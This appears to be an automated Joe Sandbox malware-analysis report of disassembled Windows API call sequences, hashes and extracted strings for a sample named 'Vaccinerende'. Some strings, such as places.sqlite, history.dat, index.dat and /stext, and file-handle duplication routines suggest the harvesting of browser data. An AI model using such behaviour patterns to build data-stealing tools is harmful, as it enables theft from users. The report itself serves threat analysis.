                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                            APIs
                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                            Similarity
                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                            • String ID:
                                            • API String ID: 1979745280-0
                                            • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                            • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                            APIs
                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                            • free.MSVCRT ref: 00418803
                                            Similarity
                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                            • String ID:
                                            • API String ID: 1355100292-0
                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                            APIs
                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                            • memset.MSVCRT ref: 00403A55
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                            Strings
                                            Similarity
                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                            • String ID: history.dat$places.sqlite
                                            • API String ID: 2641622041-467022611
                                            • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                            • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                            APIs
                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                            • GetLastError.KERNEL32 ref: 00417627
                                            Similarity
                                            • API ID: ErrorLast$File$PointerRead
                                            • String ID:
                                            • API String ID: 839530781-0
                                            • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                            • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                            Strings
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID: *.*$index.dat
                                            • API String ID: 1974802433-2863569691
                                            • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                            • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                            • GetLastError.KERNEL32 ref: 004175A2
                                            • GetLastError.KERNEL32 ref: 004175A8
                                            Similarity
                                            • API ID: ErrorLast$FilePointer
                                            • String ID:
                                            • API String ID: 1156039329-0
                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleTime
                                            • String ID:
                                            • API String ID: 3397143404-0
                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Temp$DirectoryFileNamePathWindows
                                            • String ID:
                                            • API String ID: 1125800050-0
                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                            APIs
                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                            • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CloseHandleSleep
                                            • String ID: }A
                                            • API String ID: 252777609-2138825249
                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                            APIs
                                            • malloc.MSVCRT ref: 00409A10
                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                            • free.MSVCRT ref: 00409A31
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpy
                                            • String ID:
                                            • API String ID: 3056473165-0
                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d
                                            • API String ID: 0-2564639436
                                            • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                            • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: BINARY
                                            • API String ID: 2221118986-907554435
                                            • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                            • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID: /stext
                                            • API String ID: 2081463915-3817206916
                                            • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                            • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                            • String ID:
                                            • API String ID: 2445788494-0
                                            • Opcode ID: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                            • Opcode Fuzzy Hash: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                            APIs
                                            Strings
                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: malloc
                                            • String ID: failed to allocate %u bytes of memory
                                            • API String ID: 2803490479-1168259600
                                            • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                            • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                            • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                            • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                            APIs
                                            • memset.MSVCRT ref: 0041BDDF
                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcmpmemset
                                            • String ID:
                                            • API String ID: 1065087418-0
                                            • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                            • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                            APIs
                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                            • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                            • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                              • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                              • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                            • String ID:
                                            • API String ID: 1381354015-0
                                            • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                            • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                            APIs
                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                            • String ID:
                                            • API String ID: 2154303073-0
                                            • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                            • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                            APIs
                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 3150196962-0
                                            • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                            • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
